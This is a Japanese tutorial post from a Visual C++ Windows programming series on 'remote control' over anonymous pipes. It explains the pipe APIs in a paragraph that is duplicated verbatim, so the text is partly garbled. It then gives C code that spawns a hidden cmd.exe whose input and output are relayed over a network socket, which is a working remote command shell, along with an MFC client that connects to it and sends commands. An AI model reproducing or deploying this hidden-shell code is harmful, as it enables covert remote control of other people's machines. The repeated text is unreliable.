visual c++に基づくwindowsコアプログラミングコード分析(49)匿名パイプに基づくリモート制御
匿名パイプは、親プロセスとサブプロセスの間でデータを転送するために一般的に使用される名前のない一方向パイプです.匿名のパイプは、ローカルマシン上の2つのプロセス間の通信しか実現できず、ネットワーク間の通信は実現できません.
匿名パイプ匿名パイプは、名前のない一方向パイプです.通常、親プロセスと子プロセスの間でデータを転送するために使用されます.匿名パイプは常にローカルであり、ネットワーク間でデータを転送することはできません.匿名パイプ操作CreatePipe関数は匿名パイプを作成し、2つのハンドルを返します.1つのリードパイプのハンドルと1つのライトパイプのハンドルです.リードハンドルにはパイプの読み取り専用権限があり、ライトハンドルにはパイプの書き込み専用権限があります.パイプを使用してデータを交換するには、パイプサービス側がパイプハンドルを別のプロセスに渡す必要があります.通常、これは継承によって実現される(1.1.2参照).つまり、親プロセスは、サブプロセスがこのハンドルを継承することを許可します.プロセスはまた、DuplicateHandle関数を使用してパイプハンドルをコピーし、DDEや共有メモリなどのプロセス間通信メカニズムを通じて、別の非関連プロセスに送信することもできます.パイプ・サービス・エンドは、クライアントがこのパイプでデータを送信するか、データを取得するかによって、パイプ・サービス・エンドにリード・ハンドルまたはライト・ハンドルを送信できます.パイプからデータを読み込むには、パイプのリードハンドルをパラメータとしてReadFile関数を呼び出します.別のプロセスがパイプラインにデータを書き込むと、ReadFile関数が返されます.パイプラインのすべてのライトハンドルが閉じられているか、データの読み込み中にエラーが発生した場合、ReadFile関数も返されます.パイプにデータを書き込むには、パイプの書き込みハンドルでパラメータを尋ね、WriteFile関数を呼び出します.データがパイプに完全に書き込まれたり、エラーが発生したりすると、WriteFileが返されます.WriteFile関数は、パイプラインのキャッシュがいっぱいで、まだ書き終わっていないデータがある場合、別のプロセスがパイプラインからデータを読み込むまで返されません.キャッシュのサイズは、パイプラインサービス側がCreatePipe関数を呼び出すときに指定します.匿名パイプでは、非同期読み書きはサポートされていません.これは、ReadFileExとWriteFileEx関数を使用して匿名パイプを読み書きできないことを意味します.また、匿名パイプを使用する場合、ReadFileとWriteFile関数のlpOverlappedパラメータも無視されます.匿名パイプは、すべての読み書きハンドルが閉じられるまで存在します.プロセスはCloseHandle関数を呼び出してパイプハンドルを閉じることができます.プロセスが終了すると、すべてのパイプハンドルが自動的に閉じられます.デュアル匿名パイプによる通信
リモート制御クライアントが匿名パイプ通信に参加する
匿名パイプ匿名パイプは、名前のない一方向パイプです.通常、親プロセスと子プロセスの間でデータを転送するために使用されます.匿名パイプは常にローカルであり、ネットワーク間でデータを転送することはできません.匿名パイプ操作CreatePipe関数は匿名パイプを作成し、2つのハンドルを返します.1つのリードパイプのハンドルと1つのライトパイプのハンドルです.リードハンドルにはパイプの読み取り専用権限があり、ライトハンドルにはパイプの書き込み専用権限があります.パイプを使用してデータを交換するには、パイプサービス側がパイプハンドルを別のプロセスに渡す必要があります.通常、これは継承によって実現される(1.1.2参照).つまり、親プロセスは、サブプロセスがこのハンドルを継承することを許可します.プロセスはまた、DuplicateHandle関数を使用してパイプハンドルをコピーし、DDEや共有メモリなどのプロセス間通信メカニズムを通じて、別の非関連プロセスに送信することもできます.パイプ・サービス・エンドは、クライアントがこのパイプでデータを送信するか、データを取得するかによって、パイプ・サービス・エンドにリード・ハンドルまたはライト・ハンドルを送信できます.パイプからデータを読み込むには、パイプのリードハンドルをパラメータとしてReadFile関数を呼び出します.別のプロセスがパイプラインにデータを書き込むと、ReadFile関数が返されます.パイプラインのすべてのライトハンドルが閉じられているか、データの読み込み中にエラーが発生した場合、ReadFile関数も返されます.パイプにデータを書き込むには、パイプの書き込みハンドルでパラメータを尋ね、WriteFile関数を呼び出します.データがパイプに完全に書き込まれたり、エラーが発生したりすると、WriteFileが返されます.WriteFile関数は、パイプラインのキャッシュがいっぱいで、まだ書き終わっていないデータがある場合、別のプロセスがパイプラインからデータを読み込むまで返されません.キャッシュのサイズは、パイプラインサービス側がCreatePipe関数を呼び出すときに指定します.匿名パイプでは、非同期読み書きはサポートされていません.これは、ReadFileExとWriteFileEx関数を使用して匿名パイプを読み書きできないことを意味します.また、匿名パイプを使用する場合、ReadFileとWriteFile関数のlpOverlappedパラメータも無視されます.匿名パイプは、すべての読み書きハンドルが閉じられるまで存在します.プロセスはCloseHandle関数を呼び出してパイプハンドルを閉じることができます.プロセスが終了すると、すべてのパイプハンドルが自動的に閉じられます.デュアル匿名パイプによる通信
#include <windows.h>
#include <stdio.h>
//
int cmd_shell(SOCKET target)
{
STARTUPINFO g_stStartUp;
PROCESS_INFORMATION g_stProcInfo;
HANDLE reHandle1,wrHandle1;
HANDLE reHandle2,wrHandle2;
char enter_key[2] = {0x0d,0x0a};
// SECURITY_ATTRIBUTES
SECURITY_ATTRIBUTES stSecurity;
stSecurity.nLength = sizeof(SECURITY_ATTRIBUTES);
stSecurity.lpSecurityDescriptor = NULL;
stSecurity.bInheritHandle = TRUE;//
//
CreatePipe(&reHandle1,&wrHandle1,&stSecurity,0);
CreatePipe(&reHandle2,&wrHandle2,&stSecurity,0);
// STARTUPINFO
GetStartupInfo(&g_stStartUp);
g_stStartUp.hStdInput = reHandle1;
g_stStartUp.hStdOutput = wrHandle2;
g_stStartUp.hStdError = wrHandle2;
g_stStartUp.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
g_stStartUp.wShowWindow = SW_HIDE;
// CreateProcess 、
if(CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,NORMAL_PRIORITY_CLASS,NULL,NULL,&g_stStartUp,&g_stProcInfo))
{
DWORD bytes_read,bytes_write,ret;
char buf[512] = {0};
while(1)
{
memset(buf,'\0',512);
PeekNamedPipe(reHandle2,buf,512,&bytes_read,NULL,NULL);
if(bytes_read != 0)
{
ret = ReadFile(reHandle2,buf,bytes_read,&bytes_read,NULL);
send(target,buf,strlen(buf),0);
if(ret<=0)
{
fprintf(stderr,"error on pipe %d",GetLastError());break;
}
}
else
{
bytes_read = recv(target,buf,512,0);
printf("%s",buf);
if(bytes_read<=0)
{
fprintf(stderr,"error %d",GetLastError());
}
WriteFile(wrHandle1,buf,strlen(buf),&bytes_write,NULL);
WriteFile(wrHandle1,enter_key,2,&bytes_write,NULL);
if(strcmp(buf,"exit") == 0)
{
send(target," ",8,0);
break;
}
}
}
Sleep(10);
}
printf("now Closing
");
CloseHandle(g_stProcInfo.hProcess);
CloseHandle(g_stProcInfo.hThread);
printf("now closing Pipe
");
return 0;
}
リモート制御クライアントが匿名パイプ通信に参加する
#include "stdafx.h"
#include " .h"
#include " Dlg.h"
#include <winsock.h>
#pragma comment(lib,"ws2_32")
DWORD WINAPI ServerThread(LPVOID lparam);
DWORD WINAPI GoThread(LPVOID lparam);
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
SOCKET server,client;
SOCKADDR_IN serveraddr;
char szGo[64];
/////////////////////////////////////////////////////////////////////////////
// CAboutDlg dialog used for App About
class CAboutDlg : public CDialog
{
public:
CAboutDlg();
// Dialog Data
//{{AFX_DATA(CAboutDlg)
enum { IDD = IDD_ABOUTBOX };
//}}AFX_DATA
// ClassWizard generated virtual function overrides
//{{AFX_VIRTUAL(CAboutDlg)
protected:
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV support
//}}AFX_VIRTUAL
// Implementation
protected:
//{{AFX_MSG(CAboutDlg)
//}}AFX_MSG
DECLARE_MESSAGE_MAP()
};
CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
//{{AFX_DATA_INIT(CAboutDlg)
//}}AFX_DATA_INIT
}
void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
//{{AFX_DATA_MAP(CAboutDlg)
//}}AFX_DATA_MAP
}
BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
//{{AFX_MSG_MAP(CAboutDlg)
// No message handlers
//}}AFX_MSG_MAP
END_MESSAGE_MAP()
/////////////////////////////////////////////////////////////////////////////
// CMyDlg dialog
CMyDlg::CMyDlg(CWnd* pParent /*=NULL*/)
: CDialog(CMyDlg::IDD, pParent)
{
//{{AFX_DATA_INIT(CMyDlg)
m_ipaddr = _T("");
m_port = 0;
//}}AFX_DATA_INIT
// Note that LoadIcon does not require a subsequent DestroyIcon in Win32
m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
}
void CMyDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
//{{AFX_DATA_MAP(CMyDlg)
DDX_Text(pDX, IDC_IPADDR, m_ipaddr);
DDX_Text(pDX, IDC_PORT, m_port);
//}}AFX_DATA_MAP
}
BEGIN_MESSAGE_MAP(CMyDlg, CDialog)
//{{AFX_MSG_MAP(CMyDlg)
ON_WM_SYSCOMMAND()
ON_WM_PAINT()
ON_WM_QUERYDRAGICON()
ON_BN_CLICKED(IDC_CONNECT, OnConnect)
ON_BN_CLICKED(IDC_GO, OnGo)
ON_BN_CLICKED(IDC_CLEAR, OnClear)
//}}AFX_MSG_MAP
END_MESSAGE_MAP()
/////////////////////////////////////////////////////////////////////////////
// CMyDlg message handlers
BOOL CMyDlg::OnInitDialog()
{
CDialog::OnInitDialog();
// Add "About..." menu item to system menu.
// IDM_ABOUTBOX must be in the system command range.
ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
ASSERT(IDM_ABOUTBOX < 0xF000);
CMenu* pSysMenu = GetSystemMenu(FALSE);
if (pSysMenu != NULL)
{
CString strAboutMenu;
strAboutMenu.LoadString(IDS_ABOUTBOX);
if (!strAboutMenu.IsEmpty())
{
pSysMenu->AppendMenu(MF_SEPARATOR);
pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
}
}
// Set the icon for this dialog. The framework does this automatically
// when the application's main window is not a dialog
SetIcon(m_hIcon, TRUE); // Set big icon
SetIcon(m_hIcon, FALSE); // Set small icon
//
SetDlgItemText(IDC_IPADDR,"127.0.0.1");
SetDlgItemText(IDC_PORT,"1234");
UpdateData(true);
WSADATA wsadata;
WORD word = MAKEWORD(2,2);
WSAStartup(word,&wsadata);
return TRUE; // return TRUE unless you set the focus to a control
}
void CMyDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
if ((nID & 0xFFF0) == IDM_ABOUTBOX)
{
CAboutDlg dlgAbout;
dlgAbout.DoModal();
}
else
{
CDialog::OnSysCommand(nID, lParam);
}
}
// If you add a minimize button to your dialog, you will need the code below
// to draw the icon. For MFC applications using the document/view model,
// this is automatically done for you by the framework.
void CMyDlg::OnPaint()
{
if (IsIconic())
{
CPaintDC dc(this); // device context for painting
SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), 0);
// Center icon in client rectangle
int cxIcon = GetSystemMetrics(SM_CXICON);
int cyIcon = GetSystemMetrics(SM_CYICON);
CRect rect;
GetClientRect(&rect);
int x = (rect.Width() - cxIcon + 1) / 2;
int y = (rect.Height() - cyIcon + 1) / 2;
// Draw the icon
dc.DrawIcon(x, y, m_hIcon);
}
else
{
CDialog::OnPaint();
}
}
// The system calls this to obtain the cursor to display while the user drags
// the minimized window.
HCURSOR CMyDlg::OnQueryDragIcon()
{
return (HCURSOR) m_hIcon;
}
void CMyDlg::OnConnect()
{
UpdateData(true);
CreateThread(NULL,NULL,ServerThread,this,NULL,NULL);
}
DWORD WINAPI ServerThread(LPVOID lparam)
{
CMyDlg *pDlg = (CMyDlg *)lparam;
server = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
serveraddr.sin_family = AF_INET;
serveraddr.sin_port = htons(pDlg->m_port);
serveraddr.sin_addr.S_un.S_addr = inet_addr(pDlg->m_ipaddr);
client = connect(server,(SOCKADDR *)&serveraddr,sizeof(serveraddr));
if(client == SOCKET_ERROR)
{
MessageBox(NULL,"SORRY"," ",MB_OK);
return -1;
}
MessageBox(NULL,"CONGRATULATE!"," ",MB_OK);
pDlg->SetDlgItemText(IDC_INFO," ");
char szRecv[1024];
CString str0,str1;
memset(szRecv,0,1024);
while(1)
{
recv(server,szRecv,1024,0);
pDlg->GetDlgItemText(IDC_READ,str1);
str0 = szRecv;
str0 += "\r
";
str0 += str1;
pDlg->SetDlgItemText(IDC_READ,str0);
}
return 0;
}
void CMyDlg::OnGo()
{
memset(szGo,0,64);
GetDlgItem(IDC_WRITE)->GetWindowTextA(szGo,64);
CreateThread(NULL,0,GoThread,this,NULL,NULL);
}
DWORD WINAPI GoThread(LPVOID lparam)
{
CMyDlg *pDlg = (CMyDlg *)lparam;
char enter_key[2] = {0x0d,0x0a};
send(server,szGo,sizeof(szGo),0);
if(strcmp(szGo,"exit") == 0)
{
Sleep(100);
pDlg->SetDlgItemText(IDC_INFO," ");
closesocket(server);
closesocket(client);
WSACleanup();
exit(0);
}
return 0;
}
void CMyDlg::OnClear()
{
SetDlgItemText(IDC_READ,"");
}